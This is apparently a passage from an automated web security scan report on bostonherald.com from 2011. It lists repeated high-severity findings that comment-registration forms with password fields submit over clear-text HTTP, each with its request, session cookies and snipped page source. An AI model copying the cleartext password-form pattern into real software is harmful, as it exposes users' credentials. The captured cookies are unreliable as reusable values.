Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.5. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.6. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.7. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.8. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.9. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.10. http://www.bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.11. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.12. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.13. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.14. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
